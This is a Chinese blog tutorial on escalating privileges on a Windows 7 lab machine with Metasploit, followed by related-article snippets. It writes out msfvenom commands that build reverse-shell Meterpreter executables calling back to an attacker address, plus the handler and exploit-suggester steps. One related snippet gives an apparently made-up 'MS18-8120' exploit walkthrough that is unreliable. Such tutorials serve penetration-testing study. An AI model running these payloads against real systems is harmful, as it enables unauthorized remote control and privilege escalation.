使用Metasploit对Windows7进行提权

最新推荐文章于 2024-05-19 12:00:00 发布
最新推荐文章于 2024-05-19 12:00:00 发布
阅读量606 收藏 5
点赞数 3
文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhanqinli/article/details/130284384
版权

首先在kali中安装好Metasploit(版本比较老的需要),直接输入Metasploit我们可以看到它的使用规则,它也举了例子提供查看

1、使用模块生成木马文件msfvenom -p  windows/x64/meterpreter/reverse_tcp lhost=192.168.123.123 lport=12345 -f exe -o shell.exe,然后启动http服务,让靶机访问然后下载shell文件

 2、在靶机中访问http://192.168.123.123:8000点击shell文件下载

3、接着回到kali,打开msfvenom的控制台,输入msfconsole,然后使用监听模块,输入use exploit/multi/handler进入到监听模块

 4、show options查看选项,然后设置模块信息,运行

 

 5、回到window7中,运行刚刚下载的shell文件,在kali中可以看到成功连接上了,然后在终端中输入whoami /groups可以查看当前用户权限,可以看到我们只是普通用户

 

 6、接着输入exit退出终端然后输入background将监听挂载在后台,输入search suggester搜索推荐模块,然后进入该模块

 

 7、连接到后台,让该模块来帮我们查找适合的漏洞(时间会有点久,稍微等一下)

 8、可以查看到有多个模块可以使用,查看后面的描述来选择合适的,每个人的版本都可能不一样,因此漏洞也可能不一样,建议使用前几个模块来测试,不要问为什么(因为我后面都是试过了,都不行,或许你的可以动手试试吧

 

9、 复制该路径,使用use 进入,设置session,然后执行

 10、验证权限是否成功提升,这里的步骤和上面的一样就不多说了

 

不是小学生
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Metasploit超详细安装及使用教程(图文版)
hack0919的博客
05-27 5070
本文主要以Kali Linux为主。因为Kali Linux预装了 Metasploit框架和运行在框架上的其他第三方工具
windows提权思路
weixin_68210863的博客
10-29 1092
windows十四种提权思路笔记
Metasploit入侵win7
qq_53030229的博客
11-07 1865
文章目录一、Metasploit是什么?1、Auxiliaries(辅助模块)2、Exploit(渗透攻击模块)3、payload(攻击载荷模块)4、Post(后期渗透模块)5、Encoder(编码工具模块)二、Metasploit入侵步骤1.引入库2.读入数据 一、Metasploit是什么? 这里我简单介绍一下,方便你们小白了解(大佬直接跳过就行) Metasploit框架是一个开源工具,旨在方便渗透测试,他是有ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板
【2024最新版】超详细Metasploit安装保姆级教程,Metasploit渗透测试使用,看完这一篇就够了_metasploit framework下载
最新发布
Karka_的博客
05-19 1095
Metasploit是一个渗透测试框架,可以帮助您发现和利用漏洞。Metasploit还为您提供了一个开发平台,您可以编写自己的安全工具或利用代码。今天,我将指导您了解如何使用Metasploit的基础知识:如何安装Metasploit使用框架以及利用漏洞。
利用meterperter进行win7系统提权
weixin_63137680的博客
10-30 1731
利用meterpreter对win7系统进行提权
Metasploit内网安全渗透win7
m0_65364832的博客
01-16 1558
在Kali Linux中使用Metasploit通过ms17_010(永恒之蓝)对同一局域网下的主机的445端口和139端口进行内网渗透测试。通过实践操作,了解渗透测试基本过程。
【权限提升】windows平台-提权项目&MSF&CS&溢出漏洞
今天是几号的博客
02-04 2413
简介:WES-NG是一个基于Windows系统信息实用程序输出的工具,该实用程序提供了操作系统易受攻击的漏洞列表,包括对这些漏洞的任何利用。powershell运行(上传是为了收集系统打的补丁信息,作用等同于systeminfo,当无法上传文件时,可以用systeminfo中的信息覆盖KB.json文件)简介:这是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免。覆盖项目KB.json文件(一定格式的操作系统信息 补丁信息等)
metasploit下Windows的多种提权方法
02-25
目标机:Win7在已经获取到一个meterpretershell后,假如session为1,且权限不是系统权限的前提下,使用以下列出的几种提权方法:本方法主要有以下3个模块。上面这些模块的详细信息在metasploit里已有介绍,这里不再...
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
常见windwos提权笔记
03-30
### 常见Windows提权方法详解 #### 一、提权概述 **提权**,即提升权限,指的是在获得目标系统较低级别权限的基础上,进一步获取更高级别的权限,通常是为了达到对整个系统的完全控制。对于Windows系统而言,提权...
Windows渗透与提权技巧
05-05
这份文档很可能是对上述概念的详细总结,包括具体的渗透测试步骤、提权技巧、实战案例分析,以及一些实用工具的介绍,如Nmap用于端口扫描,Metasploit Framework用于漏洞利用,Privilege Escalation Toolkit(如SET...
Meterpreter 提权
eli的博客
05-20 2188
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口为44
Windows提权
小袁的博客
11-20 1484
windows提权学习过程中的一些总结
Windows系统下安装Metasploit
m0_53482319的博客
11-16 1849
windows系统下安装Metasploit
通过Kali利用serv-u漏洞获取win7系统管理员权限
weixin_60182338的博客
02-21 1853
渗透测试仅用于个人的学习以提升能力,不能用于非法的恶意攻击。
初学MSF之渗透、提权、免杀(上)
qq_53058639的博客
08-01 1834
Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具,并且MSF团队始终在更新MSF的漏洞库,这使得MSF始终充满生机。通俗的讲,MSF就是一个集成了渗透测试全流程的渗透工具,理论上讲,我们可以只依靠MSF完成从信息收集到最终的制作后门并清理入侵痕迹的渗透测试全过程。
Windows之metasploit安装
2201_75735270的博客
12-23 1080
​​就是一个漏洞框架。它的全称叫做​​,简称叫做​​MSF​​。​​作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。0x01 安装、基本操作kali Linux自带Metasploit,直接使用命令msfconsole启动即可windows 可安装windows版本的msf,然后cmd启动msfconsole (windows最新版本​​下载链接​​) 提取码:5qmi​ 2、建立搜索缓存(数据库)启动​​数据库服务:​。
利用Metasploit控制目标电脑(Win7_x64系统)
天涯的浪子
07-28 788
MSF,是The Metasploit Framework的简称。MSF是一个非常好用的渗透框架,里面集成了许多框架和工具;MSF高度模块化,即框架由多个module组成。进一步解释,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新;metasploit涵盖了渗透测试中全过程,可以在这个框架下利用现有的Payload进行一系列的渗透测试。 MS17-010(永恒之蓝)漏洞简介 永恒之蓝是指2017年4月14日晚,黑客团体Shado...
在Kali操作系统上使用metasploit
weixin_55280439的博客
03-29 3205
meterpreter 是强大的后渗透模块,可以输入help 查看帮助信息,远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统.......这些看起来非常复杂又高级的操作都能用meterpreter 中的一行或几个字母,简单的命令完成。[*Payload 是攻击载荷,就是攻击完成后想获取的东西,这里是想获取 meterpreter](注:显示攻击失败表示目标主机上没有此漏洞,此漏洞只适用于攻击自己的win7靶机,高版本的系统已经修复此漏洞,显示WIN 表示攻击成功,其他则是失败)
(1) 利用MS18-8120通过Metasploit对Windows提权
05-10
MS18-8120是一个Windows提权漏洞,它可以影响Windows 7 SP1 x86和x64、Windows 8.1 x86和x64、Windows Server 2008 R2 SP1、Windows Server 2012和Windows Server 2012 R2。这个漏洞是在Windows内核中存在一个缺陷,攻击者可以利用这个缺陷来提升他们的权限,从而执行任意代码。 下面是一些利用MS18-8120漏洞进行Windows提权的步骤: 1.使用Metasploit框架:Metasploit是一个开源的渗透测试框架,它可以帮助安全专业人员快速、高效地发现和利用漏洞。在这个案例中,我们将使用Metasploit框架来利用MS18-8120漏洞。 2. 扫描目标:首先,我们需要扫描目标系统以检测是否存在漏洞。使用Nmap或其他扫描工具扫描目标IP地址,如下所示: ``` nmap -sV -O targetIP ``` 3. 打开Metasploit:打开Kali Linux操作系统并打开Metasploit框架,使用以下命令: ``` msfconsole ``` 4. 搜索漏洞利用模块:在Metasploit控制台中,使用以下命令搜索与MS18-8120漏洞相关的模块: ``` search MS18-8120 ``` 5. 选择漏洞利用模块:从搜索结果中选择一个适合我们的漏洞利用模块。在这个案例中,我们将选择“exploit/windows/local/ms18_8120_dcom”,使用以下命令: ``` use exploit/windows/local/ms18_8120_dcom ``` 6. 配置漏洞利用模块:在我们使用模块之前,我们需要配置一些参数。使用以下命令来查看可用的参数: ``` show options ``` 7. 配置目标IP地址和端口号:我们需要设置目标IP地址和端口号。使用以下命令设置目标IP地址和端口号: ``` set RHOST targetIP set RPORT targetPort ``` 8. 运行漏洞利用模块:设置完参数后,使用以下命令运行漏洞利用模块: ``` run ``` 9. 检查提权结果:漏洞利用模块运行后,我们可以检查提权结果。使用以下命令检查当前用户的权限: ``` getuid ``` 如果返回结果为“NT AUTHORITY\SYSTEM”,则说明我们已经成功提升了我们的权限。 总结: 通过使用Metasploit框架和MS18-8120漏洞利用模块,我们可以快速、高效地进行Windows提权攻击。但是请注意,任何未经授权的攻击都是非法的。只有在合法的渗透测试环境中使用这些技术。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值